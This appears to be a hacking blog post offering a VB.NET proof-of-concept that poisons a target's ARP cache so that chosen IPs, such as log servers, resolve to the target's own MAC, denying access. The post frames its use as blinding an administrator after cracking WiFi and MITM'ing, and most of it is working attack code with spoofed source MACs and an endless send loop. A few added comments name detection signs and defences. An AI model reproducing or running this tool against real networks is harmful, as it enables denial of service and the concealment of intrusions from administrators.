ARP Land Attack

Yeah, you know the deal.
Another network-based attack! This time, a LAND-attack (Local Area Network Denial – attack).
I know the first thing that comes to your mind is:
“LAME. With a MITM (Man-in-the-Middle), you can at least steal data, with this you simply DoS someone…”
Not so fast.
I’ve actually found this quite useful.
It requires a very small number of packets to null-route a remote computer (remote, as in a computer on the LAN you don’t have physical access to).
Imagine this scenario:
  1. You found an encrypted WiFi-network.
  2. You cracked it.
  3. You got in and started MITM’ing.
  4. However! The administrator notices, and starts checking the logs.
  5. What to do?!
  6. You get paranoid and stop.
But. What if.
…the administrator is unable to access the logs?
…because his ARP-cache tells him the remote logs are on his local computer?
Who’s paranoid then?
This is a PoC of how you can poison the evil administrator’s routes to critical systems (the systems you’re after?) so that they point back to himself.

001    Imports nokitel.PCAP 'Make sure your project is running .NET 3.5; and add a reference to nokitel.dll.
002    Module ARP_Land_Attack
           ' Console proof-of-concept: sends forged ARP replies to one target host so that the
           ' target's ARP cache maps each listed IPv4 address to the target's own MAC address.
           ' Flow (see Main): list NICs, pick one, pick the target, collect the IPs to poison,
           ' then send the forged replies in an endless loop.
           '
           ' What the frames built in Nullroute look like on the wire, for detection purposes:
           '   - ARP replies addressed to a single host, re-sent for every listed IP with a
           '     2000 ms pause between rounds;
           '   - the Ethernet source MAC is taken from nokitel.Format.RandomMAC for every frame,
           '     while the ARP sender hardware address is the recipient's own MAC, so the
           '     Ethernet source and the ARP sender hardware address do not agree;
           '   - the ARP sender protocol address and target protocol address carry the same IP.
           ' Switch-side ARP validation (for example Dynamic ARP Inspection backed by DHCP
           ' snooping), static ARP entries for critical hosts such as log servers, and
           ' ARP-change monitoring are the usual controls against this class of spoofing.
003        Private NIC As Adapters.Adapter = Nothing 'The NIC you will send from.
004        Private Adapters As New Adapters 'An instance of the NIC enumeration.
005        Private TargetMAC As String 'Target's MAC address.
006        Private TargetIP As Net.IPAddress 'Target's IPv4 address.
007        Private NullRoutes As New ArrayList 'List of Route entries whose IPs will be poisoned on the target.
           ' One address to poison: the IPv4 address and the MAC stored for it in MakeNullroutes.
008        Private Structure Route
009            Dim IP As Net.IPAddress
010            Dim MAC As String
011        End Structure
           ' Entry point: runs the interactive steps in order; Nullroute never returns (endless loop).
012        Sub Main()
013            ShowNICs()
014            ChooseNIC()
015            ChooseTarget() 'Who will we attack?
016            MakeNullroutes() 'What routes should we attack?
017            Nullroute() 'Attack!
018        End Sub
           ' Prompts until the input passes nokitel.Format.IsIPv4, then stores the target's MAC
           ' (as returned by nokitel.Parse.ARP.GetMAC for the chosen NIC's IP) and its IP address.
019        Private Sub ChooseTarget()
020            Dim Dummy As String = vbNullString
021            Do
022                Console.WriteLine()
023                Console.WriteLine("< Enter the targets IPv4:")             Console.Write("> ")
024                Dummy = Console.ReadLine
025            Loop Until nokitel.Format.IsIPv4(Dummy)
026            TargetMAC = nokitel.Parse.ARP.GetMAC(Dummy, NIC.IP)
027            TargetIP = nokitel.Format.StringToIPAddress(Dummy)
028        End Sub
           ' Collects the list of IPv4 addresses to poison into NullRoutes.
           ' The inner loop reads lines until one is a valid IPv4 address or matches one of the
           ' start keywords; the outer loop ends only when a keyword was entered and at least one
           ' route has been collected.
029        Private Sub MakeNullroutes()
030            Dim Dummy As String = vbNullString
031            Dim ExitSub As Boolean = False 'Set when the user typed one of the start keywords.
032            Console.WriteLine()
033            Console.WriteLine("< Write ""start"" to poison the target.")
034            Do
035                Do
036                    Console.WriteLine("< Enter an IPv4 to nullroute:")                 Console.Write("> ")
037                    Dummy = Console.ReadLine
038                    If Not String.IsNullOrEmpty(Dummy) Then
                           ' NOTE(review): the pattern is an unanchored alternation; whether RegexMatch
                           ' matches anywhere in the input or only the whole line is not visible here.
039                        If nokitel.Format.RegexMatch(Dummy, "launch|start|attack|destroy|poison|kill|exterminate") Then
040                            ExitSub = True
041                            Exit Do
042                        End If
043                    End If
044                Loop Until nokitel.Format.IsIPv4(Dummy)
045                If ExitSub Then
046                    If NullRoutes.Count > &H0 Then
047                        Exit Do
048                    Else
049                        Console.WriteLine("! Enter atleast one route to poison.")
050                        ExitSub = Not ExitSub 'Reset the flag (it is True here) and keep prompting.
051                    End If
052                Else
053                    Dim Entry As New Route
054                    With Entry
055                        .IP = nokitel.Format.StringToIPAddress(Dummy) 'The IP-address to poison
056                        .MAC = nokitel.Parse.ARP.GetMAC(.IP.ToString, NIC.IP) 'The corresponding MAC-address attached to the IP.
057                        If String.IsNullOrEmpty(.MAC) Then .MAC = "00:00:00:00:00:00" 'If the ARP-request fails, we simply make a "blackhole".
058                    End With
059                    NullRoutes.Add(Entry) 'Add the route to the list.
060                End If
061            Loop
062            Console.WriteLine()
063        End Sub
           ' Builds and sends one forged ARP reply per entry in NullRoutes, then sleeps 2000 ms and
           ' repeats. The Do ... Loop has no exit condition, so this Sub does not return on its own.
064        Private Sub Nullroute()
065            Dim Ethernet As New nokitel.Parse.Ethernet.Ethernet
066            Dim ARP As New nokitel.Parse.ARP.ARP
067            Dim Payload(nokitel.Parse.ARP.OFFSET) As Byte 'Frame buffer; both Make calls below write into it.
068            Do
069                For Each Route As Route In NullRoutes
070                    With Ethernet
071                        .DestinationMAC = TargetMAC 'Unicast to the target only, not broadcast.
072                        .SourceMAC = nokitel.Format.RandomMAC 'Spoof that it's not us. Who knows? (Differs from the ARP sender hardware address below.)
073                        .Type = nokitel.Parse.Ethernet.Ethernet_Types.ARP
074                    End With
075                    With ARP
076                        .HardwareType = nokitel.Parse.ARP.HardwareType.Ethernet
077                        .Operation = nokitel.Parse.ARP.OPCODES.Reply
078                        .ProtocolAddressLength = &H4 'IPv4 Length (4 bytes).
079                        .HardwareAddressLength = &H6 'MAC-address Length (6 bytes).
080                        .ProtocolType = nokitel.Parse.ARP.ProtocolType.IP
081                        .SenderHardwareAddress = TargetMAC 'Set the route's IP to the targets own MAC-address.
082                        .SenderProtocolAddress = nokitel.Format.StringToIPAddress(Route.IP.ToString)
083                        .TargetHardwareAddress = Route.MAC 'The MAC stored for this route (all zeros if it could not be resolved).
084                        .TargetProtocolAddress = nokitel.Format.StringToIPAddress(Route.IP.ToString) 'Same IP as the sender protocol address.
085                        Console.WriteLine("Poisoning " & TargetIP.ToString & "'s ARP-Cache ### " & Route.IP.ToString & " -=> " & TargetMAC)
086                    End With
087                    nokitel.Parse.Ethernet.Make(Payload, Ethernet) 'Grab the structures and convert them to raw-bytes.
088                    nokitel.Parse.ARP.Make(Payload, ARP)
089                    NIC.Send(Payload) 'Send the bogus packets!
090                Next
091                System.Threading.Thread.Sleep(2000) 'Sleep for a while, we don't need to be quick.
092            Loop
093        End Sub
           ' Prints the properties of every adapter returned by Adapters.Enumurate, with its index as ID.
094        Private Sub ShowNICs()
095            For Index As Integer = &H0 To Adapters.Enumurate.Length - &H1 'Loop through all available NIC's, and display their stats:
096                With Adapters.Enumurate(Index)
097                    Console.WriteLine("* ID:            " & Index)
098                    Console.WriteLine("* Name:          " & .Name)
099                    Console.WriteLine("* Description:   " & .Description)
100                    Console.WriteLine("* GUID:          " & .GUID)
101                    Console.WriteLine("* Netmask:       " & .Netmask)
102                    Console.WriteLine("* Destination:   " & .DestinationAddress)
103                    Console.WriteLine("* Broadcast:     " & .BroadcastAddress)
104                    Console.WriteLine("* IP:            " & .IP)
105                    Console.WriteLine("* MAC:           " & .MAC)
106                    Console.WriteLine("* Gateway IP:    " & .GatewayIP)
107                    Console.WriteLine("* Gateway MAC:   " & .GatewayMAC)
108                    Console.WriteLine("* Supports WiFi: " & CStr(If(.IsWIFI, "Yes", "No")) & ".")
109                End With
110                Console.WriteLine()
111            Next
112        End Sub
           ' Prompts until the user enters an ID within the range of Adapters.Enumurate, stores that
           ' adapter in NIC and opens it; if Open returns False the program prints an error and ends.
113        Private Sub ChooseNIC()
114            Dim ID As String = vbNullString
115            Do
116                Console.Write("> ")
117                ID = Console.ReadLine
118                If IsNumeric(ID) Then
                       ' ID is a String; the comparisons and the index below rely on implicit
                       ' String-to-number conversion.
119                    If ID >= &H0 And ID < Adapters.Enumurate.Length Then
120                        NIC = Adapters.Enumurate(ID) 'Set the NIC-variable to the corresponding index from the "ShowNICs()" output.
                           ' NOTE(review): the first argument of Open is omitted and the second is False;
                           ' their meaning is defined by nokitel and is not visible in this listing.
121                        If Not NIC.Open(, False) Then
122                            Console.WriteLine("x Unable to hook device!")
123                            End 'Terminates the program.
124                        End If
125                        Exit Do
126                    End If
127                End If
128            Loop
129        End Sub
130    End Module


Yeah, the code is a bit long. Sorry for that.
But I hope you understand the scenario.
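Note: His ARP-Cache gets restored almost instantly after you quit the attack, presumably because the forged entries are overwritten by genuine ARP traffic or age out once the spoofed replies stop. So no real harm done.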
A pre-compiled Win32 executable can be downloaded from here.
And here’s a screenshot of how I nullified my laptop:



source:h.ackack

